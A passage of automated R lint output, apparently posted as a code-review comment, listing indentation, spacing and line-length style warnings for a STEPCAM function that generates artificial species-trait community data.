\"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never 